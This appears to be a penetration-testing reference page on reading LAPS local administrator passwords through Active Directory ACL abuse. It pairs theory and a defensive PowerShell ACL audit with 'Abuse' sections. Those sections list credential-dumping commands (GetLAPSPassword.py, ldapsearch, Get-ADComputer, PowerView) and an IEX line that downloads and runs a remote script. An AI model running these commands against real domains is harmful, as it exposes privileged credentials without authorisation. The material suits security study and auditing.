PRIMARY CATEGORY → DACL ABUSE
Theory
The LAPS solution allows sysadmins to manage the local administrator password of domain-joined computers in a simpler way
It periodically generates a complex password for the managed local account on each machine and stores it in a specific attribute of the corresponding domain computer account object
The password in question can be stored either in plain text or encrypted
When Legacy Microsoft LAPS is deployed in the AD environment, two attributes are added to each domain computer account
- ms-Mcs-AdmPwd
- ms-Mcs-AdmPwdExpirationTime
The former contains the password in plain text, while the latter specifies the password expiration date
On the other hand, when Windows LAPS is deployed, the following attributes are set on the computer account objects
- msLAPS-Password
- msLAPS-EncryptedPassword
Both attributes store the object's password, the first in plain text and the latter encrypted
By default, only Domain Admins can read the administrator password of any domain-joined machine
However, any account holding one of the following rights over a domain computer account could end up reading that computer's password
- User or group with "Read All Properties" or "Read ms-Mcs-AdmPwd"
- GenericAll (FullControl), WriteDACL, WriteOwner, AllExtendedRights or WriteProperty
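A defender's counterpart to the rights listed above is an ACL audit that reports which principals, other than the ones expected to hold them, have those rights on computer objects. The following PowerShell is an added example and not part of the original page; it assumes the ActiveDirectory module, a Legacy LAPS schema (ms-Mcs-AdmPwd present), and that the $expected list of trusted principals is adjusted to the environment.

```powershell
# Added example: audit computer-object ACEs that would allow reading the Legacy LAPS password.
# Assumptions: ActiveDirectory module available, Legacy LAPS schema extension in place,
# and the account running this can read ACLs on computer objects.
Import-Module ActiveDirectory

# Resolve the schemaIDGUID of ms-Mcs-AdmPwd: ACEs scoped to that attribute carry it as ObjectType
$schemaNC   = (Get-ADRootDSE).schemaNamingContext
$admPwdAttr = Get-ADObject -SearchBase $schemaNC -LDAPFilter '(lDAPDisplayName=ms-Mcs-AdmPwd)' -Properties schemaIDGUID
$admPwdGuid = [guid]$admPwdAttr.schemaIDGUID
$allObjects = [guid]::Empty   # ObjectType of an ACE that applies to every property and right

# Rights named on this page that lead, directly or via DACL modification, to reading the password
$dangerous = 'GenericAll|WriteDacl|WriteOwner|ExtendedRight|WriteProperty|ReadProperty'

# Principals expected to hold those rights (assumption: tune for your environment)
$expected = @(
    'NT AUTHORITY\SYSTEM',
    'BUILTIN\Administrators',
    "$env:USERDOMAIN\Domain Admins",
    "$env:USERDOMAIN\Enterprise Admins"
)

$findings = foreach ($computer in Get-ADComputer -Filter *) {
    $acl = Get-Acl -Path "AD:\$($computer.DistinguishedName)"
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($ace.ActiveDirectoryRights.ToString() -notmatch $dangerous) { continue }
        # Keep only ACEs that cover all properties/rights or specifically ms-Mcs-AdmPwd
        if ($ace.ObjectType -ne $allObjects -and $ace.ObjectType -ne $admPwdGuid) { continue }
        if ($expected -contains $ace.IdentityReference.Value) { continue }
        [pscustomobject]@{
            Computer  = $computer.Name
            Principal = $ace.IdentityReference.Value
            Rights    = $ace.ActiveDirectoryRights.ToString()
            Scope     = if ($ace.ObjectType -eq $admPwdGuid) { 'ms-Mcs-AdmPwd' } else { 'All properties' }
            Inherited = $ace.IsInherited
        }
    }
}

$findings | Sort-Object Principal, Computer | Format-Table -AutoSize
```

Every row in the output is a principal that can read (or grant itself the ability to read) the LAPS password of that computer without being a Domain Admin; inherited entries usually point at an OU-level delegation, which is where the fix belongs. Narrow the Get-ADComputer query with -SearchBase on large domains.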
Abuse - UNIX-like
Impacket's GetLAPSPassword.py
GetLAPSPassword.py -dc-ip '<DC_IP>' '<DOMAIN>/<USER>:<PASSWD>'
LDAPsearch
ldapsearch -LLL -x -H 'ldap://<DC_FQDN>' -D '<UPN>' -w '<PASSWD>' -b 'DC=<DOMAIN>,DC=<TLD>' '(ObjectClass=Computer)' 'ms-mcs-admpwd' | grep -i -- 'ms-mcs-admpwd'
Abuse - Windows
PowerShell AD Module
Get-ADComputer -Filter {ms-mcs-admpwdexpirationtime -like '*'} -Properties 'ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'
PowerView
Setup
IEX (New-Object Net.WebClient).DownloadString('https://github.com/PowerShellMafia/PowerSploit/raw/refs/heads/master/Recon/PowerView.ps1')
Usage
Get-DomainComputer
Get-DomainComputer '<TARGET>' -Properties 'cn', 'ms-mcs-admpwd', 'ms-mcs-admpwdexpirationtime' | fl